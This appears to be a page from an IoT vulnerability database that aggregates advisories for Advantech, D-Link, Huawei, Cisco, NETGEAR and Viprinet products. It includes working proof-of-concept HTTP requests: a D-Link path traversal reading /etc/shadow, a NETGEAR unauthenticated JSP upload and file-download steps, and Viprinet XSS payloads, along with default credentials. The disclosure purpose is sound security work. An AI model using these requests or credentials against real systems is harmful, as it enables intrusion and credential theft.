VARIoT IoT vulnerabilities database

This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.

This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C7D IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to sprintf using the ProjectName and NodeName parameters. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.

D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 discloses usernames, passwords, keys, values, and web account hashes (super and admin) in plaintext when running a configuration backup, which allows remote attackers to obtain sensitive information. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. A security vulnerability exists in the D-LinkDVG-N5402SP that originated from the program storing data in clear text. An attacker could exploit this vulnerability to obtain sensitive information. DLink DVG­N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05 Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgi­bin/webproc HTTP/1.1 Host: <IP>:8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://<IP>:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 has a default password of root for the root account and tw for the tw account, which makes it easier for remote attackers to obtain administrative access. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. A security vulnerability exists in D-LinkDVG-N5402SP that originated from a hard-coded certificate used by the program. An attacker could exploit this vulnerability to gain administrator control. DLink DVG­N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05 Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user *1. Path traversal* Arbitrary files can be read off of the device file system. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgi­bin/webproc HTTP/1.1 Host: <IP>:8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://<IP>:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter. ( Dot dot ) including errorpage Important information may be read via parameters. The D-Link DVG-N5402SP is a wireless router product from D-Link for voice, fax and shared wireless Internet over IP networks. An attacker could exploit this vulnerability to read arbitrary files. DLink DVG­N5402SP is prone to multiple security vulnerabilities. Attackers can leverage these issues to bypass the authentication mechanism and gain access to the vulnerable device, use directory-traversal characters ('../') and obtain sensitive information; other attacks are also possible. DLink DVG­N5402SP File Path Traversal, Weak Credentials Management, and Sensitive Info Leakage Vulnerabilities *Timelines* Reported to CERT + Vendor: August 2015 Dlink released beta release: Oct 23, 2015 New fix release: MD5 (GRNV6.1U23J-83-DL-R1B114-SG_Normal.EN.img) = 04fd8b901e9f297a4cdbea803a9a43cb No public disclosure till date - Dlink waiting for Service providers to ask for new release + CERT opted out *Vulnerable Models, Firmware, Hardware versions* DVG­N5402SP Web Management Model Name : GPN2.4P21­C­CN Firmware Version : W1000CN­00 Firmware Version :W1000CN­03 Firmware Version :W2000EN­00 Hardware Platform :ZS Hardware Version :Gpn2.4P21­C_WIFI­V0.05 Device can be managed through three users: 1. super ­ full privileges 2. admin ­ full privileges 3. support ­ restricted user *1. *CVE-ID*: CVE-2015-7245 *HTTP Request * POST /cgi­bin/webproc HTTP/1.1 Host: <IP>:8080 User­Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept­Language: en­US,en;q=0.5 Accept­Encoding: gzip, deflate Referer: http://<IP>:8080/cgi­bin/webproc Cookie: sessionid=abcdefgh; language=en_us; sys_UserName=super Connection: keep­alive Content­Type: application/x­www­form­urlencoded Content­Length: 223 getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/shadow&var%3Amenu=setup&var%3Apage=connected&var% &obj­action=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh *HTTP Response* HTTP/1.0 200 OK pstVal­>name:getpage; pstVal­>value:html/main.html pstVal­>name:getpage; pstVal­>value:html/index.html pstVal­>name:errorpage; pstVal­>value:../../../../../../../../../../../etc/shadow pstVal­>name:var:menu; pstVal­>value:setup pstVal­>name:var:page; pstVal­>value:connected pstVal­>name:var:subpage; pstVal­>value:­ pstVal­>name:obj­action; pstVal­>value:auth pstVal­>name::username; pstVal­>value:super pstVal­>name::password; pstVal­>value:super pstVal­>name::action; pstVal­>value:login pstVal­>name::sessionid; pstVal­>value:1ac5da6b Connection: close Content­type: text/html Pragma: no­cache Cache­Control: no­cache set­cookie: sessionid=1ac5da6b; expires=Fri, 31­Dec­9999 23:59:59 GMT; path=/ #root:<hash_redacted>:13796:0:99999:7::: root:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: #tw:<hash_redacted>:13796:0:99999:7::: *2. Use of Default, Hard­Coded Credentials**CVE-ID*: CVE-2015-7246 The device has two system user accounts configured with default passwords (root:root, tw:tw). Login ­ tw ­ is not active though. Anyone could use the default password to gain administrative control through the Telnet service of the system (when enabled) leading to integrity, loss of confidentiality, or loss of availability. *3.Sensitive info leakage via device running configuration backup * *CVE-ID*: CVE-2015-7247 Usernames, Passwords, keys, values and web account hashes (super & admin) are stored in clear­text and not masked. It is noted that restricted 'support' user may also access this config backup file from the portal directly, gather clear-text admin creds, and gain full, unauthorized access to the device. -- Best Regards, Karn Ganeshen ipositivesecurity.blogspot.in

Both the Huawei P8 and Mate S are smartphone products from China's Huawei. A local security bypass vulnerability exists in Huawei P8 and Mate S. An attacker could use this vulnerability to bypass security restrictions

Integer overflow in the graphics drivers in Huawei Mate S smartphones with software CRR-TL00 before CRR-TL00C01B160SP01, CRR-UL00 before CRR-UL00C00B160, and CRR-CL00 before CRR-CL00C92B161 allows attackers to cause a denial of service (system crash) or gain privileges via a crafted application, which triggers a heap-based buffer overflow. HuaweiMateS is a smartphone product from China Huawei. Huawei Mate S is prone to a local integer-overflow vulnerability. Failed exploit attempts will likely cause denial-of-service conditions. The following versions are affected: Huawei Mate S using CRR-TL00C01B153SP01 and earlier, CRR-UL00C00B153 and earlier, and CRR-CL00C92B153 and earlier versions of the software

Cisco Nexus 9000 Application Centric Infrastructure (ACI) Mode switches with software before 11.0(1c) allow remote attackers to cause a denial of service (device reload) via an IPv4 ICMP packet with the IP Record Route option, aka Bug ID CSCuq57512. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCuq57512

The RBAC implementation in Cisco ASA-CX Content-Aware Security software before 9.3.1.1(112) and Cisco Prime Security Manager (PRSM) software before 9.3.1.1(112) allows remote authenticated users to change arbitrary passwords via a crafted HTTP request, aka Bug ID CSCuo94842. Vendors have confirmed this vulnerability Bug ID CSCuo94842 It is released as. Supplementary information : CWE Vulnerability type by CWE-284: Improper Access Control ( Inappropriate access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlCrafted by remotely authenticated users HTTP Any password may be changed via request. An attacker can exploit this issue to gain elevated privileges on an affected application. PRSM is a multi-device management platform for ASA-CX. The platform can add multiple ASA CX devices to PRSM's device inventory and apply security policies to their devices. A remote attacker could exploit this vulnerability to change arbitrary passwords by sending specially crafted HTTP requests

Cisco Application Policy Infrastructure Controller (APIC) devices with software before 1.0(3h) and 1.1 before 1.1(1j) and Nexus 9000 ACI Mode switches with software before 11.0(3h) and 11.1 before 11.1(1j) allow remote authenticated users to bypass intended RBAC restrictions via crafted REST requests, aka Bug ID CSCut12998. Vendors report this vulnerability Bug ID CSCut12998 Published as. Supplementary information : CWE Vulnerability types by CWE-284: Improper Access Control ( Improper access control ) Has been identified. http://cwe.mitre.org/data/definitions/284.htmlCrafted by a remotely authenticated user REST Via a request, RBAC Restrictions may be bypassed. Cisco ApplicationPolicyInfrastructureControllers and CiscoNexus9000SeriesACIModeSwitches are products of Cisco. The former is a controller that automates the management of application-centric infrastructure (ACI). The latter is a 9000 series switch for Application-Centric Infrastructure (ACI). Security vulnerabilities exist in CiscoAPIC and Nexus9000ACIModeSwitches, which can be exploited by remote attackers to bypass established RBAC restrictions by sending specially crafted REST requests. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks

SQL injection vulnerability in Cisco Unified Communications Manager 10.5(2.13900.9) allows remote authenticated users to execute arbitrary SQL commands via a crafted URL, aka Bug ID CSCux99227. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. This issue being tracked by Cisco Bug ID CSCux99227. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution

Cross-site scripting (XSS) vulnerability in Cisco Unity Connection 11.5(0.199) allows remote attackers to inject arbitrary web script or HTML via a crafted URL, aka Bug ID CSCuy09033. Cisco UnityConnection (UC) is a set of voice message platform from Cisco. The platform can use voice commands to make calls or listen to messages in a \342\200\234hands-free\342\200\235 manner. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue is being tracked by Cisco Bug ID CSCuy09033

Cross-site scripting (XSS) vulnerability in the management interface in Cisco Jabber Guest Server 10.6(8) allows remote attackers to inject arbitrary web script or HTML via the host tag parameter, aka Bug ID CSCuy08224. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. These issues are being tracked by Cisco Bug ID CSCuy08224

Multiple unrestricted file upload vulnerabilities in NETGEAR Management System NMS300 1.5.0.11 and earlier allow remote attackers to execute arbitrary Java code by using (1) fileUpload.do or (2) lib-1.0/external/flash/fileUpload.do to upload a JSP file, and then accessing it via a direct request for a /null URI. A directory traversal vulnerability enables authenticated users to download arbitrary files. ( Dot dot ) including realName An arbitrary file may be read through the parameter. Supplementary information : CWE Vulnerability type by CWE-434: Unrestricted Upload of File with Dangerous Type ( Unlimited upload of dangerous types of files ) Has been identified. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable. >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 04/02/2016 / Last updated: 04/02/2016 >> Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network." >> Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name" [name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Hello World Example</title> </head> <body> <h2>A Hello World Example of JSP.</h2> </body> </html> ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3-- #2 Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 Three steps need to be taken in order to exploit this vulnerability: a) Add a configuration image, with the realName parameter containing the path traversal to the target file: POST /data/config/image.do?method=add HTTP/1.1 realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000 Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"} c) Download the file with the imageId obtained in step 2: GET /data/config/image.do?method=export&imageId=<ID> >> Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. >> References: [1] https://www.kb.cert.org/vuls/id/777024 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>

The hardware VPN client in Viprinet MultichannelVPN Router 300 version 2013070830/2013080900 does not validate the remote VPN endpoint identity (through the checking of the endpoint's SSL key) before initiating the exchange, which allows an attacker to perform a Man in the Middle attack. ViprinetEuropeMultichannelVPNRouter300 is a multi-channel VPN router product from ViprinetEurope, Germany. A security vulnerability exists in ViprinetEuropeMultichannelVPNRouter300 that caused the program to fail to validate the certificate. An attacker could exploit the vulnerability to perform a man-in-the-middle attack and impersonate a trusted server. Multiple cross-site scripting vulnerabilities 2. An HTML-injection vulnerability 3. Multiple security-bypass vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and to launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers or bypass certain security restrictions and perform unauthorized actions. In this example, we perform a downgrade attack from protocol version 3 to protocol version 2, however as noted in the impact, version 3 of the protocol is similarly affected. Note: MITRE have assigned CVE-2014-9754 to reference the missing certificate validation and CVE-2014-9755 to reference the protocol downgrade attack. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-9754-cve-2014-9755/ Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information

The hardware VPN client in Viprinet MultichannelVPN Router 300 version 2013070830/2013080900 does not validate the remote VPN endpoint identity (through the checking of the endpoint's SSL key) before initiating the exchange, which allows remote attackers to perform a replay attack. ViprinetEuropeMultichannelVPNRouter300 is a multi-channel VPN router product from ViprinetEurope, Germany. A security vulnerability exists in ViprinetEuropeMultichannelVPNRouter300. An attacker could exploit the vulnerability to implement a protocol downgrade attack. Multiple cross-site scripting vulnerabilities 2. Multiple security-bypass vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and to launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers or bypass certain security restrictions and perform unauthorized actions. In this example, we perform a downgrade attack from protocol version 3 to protocol version 2, however as noted in the impact, version 3 of the protocol is similarly affected. Note: MITRE have assigned CVE-2014-9754 to reference the missing certificate validation and CVE-2014-9755 to reference the protocol downgrade attack. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-9754-cve-2014-9755/ Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information

Multiple cross-site scripting (XSS) vulnerabilities in the old and new interfaces in Viprinet Multichannel VPN Router 300 allow remote attackers to inject arbitrary web script or HTML via the username when (1) logging in or (2) creating an account in the old interface, (3) username when creating an account in the new interface, (4) hostname in the old interface, (5) inspect parameter in the config module, (6) commands parameter in the atcommands tool, or (7) host parameter in the ping tool. ViprinetEuropeMultichannelVPNRouter300 is a multi-channel VPN router product from ViprinetEurope, Germany. A cross-site scripting vulnerability exists in ViprinetEuropeMultichannelVPNRouter300. An attacker could exploit this vulnerability to inject arbitrary web scripts or HTML. An HTML-injection vulnerability 3. Multiple security-bypass vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials and to launch other attacks, perform man-in-the-middle attacks and impersonate trusted servers or bypass certain security restrictions and perform unauthorized actions. This is a normal feature of many applications, however, in this instance the application failed to restrict the type of data that could be stored and also failed to sanitise it, meaning that it could not be safely rendered by the browser. Stored cross-site scripting could be triggered by: Attempting to login with a username of `<script>alert(1)</script>’ (affects `old’ interface and results in post-authentication cross-site Scripting when a legitimate administrator views the realtime log) Creating an account with a username of `<script>alert(1)</script>’ (affects both `old’ and `new’ interfaces once created) Setting the device’s hostname to `<script>alert(1)</script>’ (affects `old’ interface once created) A number of locations were identified as being vulnerable to reflective attacks, including: http://<host>/exec?module=config&sessionid=<sessionid>&inspect=%3Cscript%20src=http://localhost:9090%3E%3C/script%3E http://<host>/exec?tool=atcommands&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&commands=%3Cscript%3Ealert%281%29%3C%2Fscript%3E http://<host>/exec?tool=ping&sessionid=<sessionid>&sourceobject=WANINTERFACELIST.OBJECT__0&module=configtools&host=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pingcount=3&databytes=56 The inclusion of session IDs in all URLs partially mitigates the reflective cross-site scripting but could itself be considered a vulnerability since it is included in referred headers and log files. These are simply some examples of how this attack might be performed, and the it is believed that both the `old’ and `new’ web applications are systemically vulnerable to this. Further details at: https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2045/ Copyright: Copyright (c) Portcullis Computer Security Limited 2015, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited. Disclaimer: The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information

Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable. >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 04/02/2016 / Last updated: 04/02/2016 >> Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network." >> Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. >> Technical details: #1 Vulnerability: Remote code execution via arbitrary file upload (unauthenticated) CVE-2016-1525 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 There are two servlets that allow unauthenticated file uploads: @RequestMapping({ "/fileUpload.do" }) public class FileUpload2Controller - Uses spring file upload @RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" }) public class FileUploadController - Uses flash upload The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name" [name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Hello World Example</title> </head> <body> <h2>A Hello World Example of JSP.</h2> </body> </html> ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3-- #2 Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 Three steps need to be taken in order to exploit this vulnerability: a) Add a configuration image, with the realName parameter containing the path traversal to the target file: POST /data/config/image.do?method=add HTTP/1.1 realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000 Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"} c) Download the file with the imageId obtained in step 2: GET /data/config/image.do?method=export&imageId=<ID> >> Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. >> References: [1] https://www.kb.cert.org/vuls/id/777024 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>

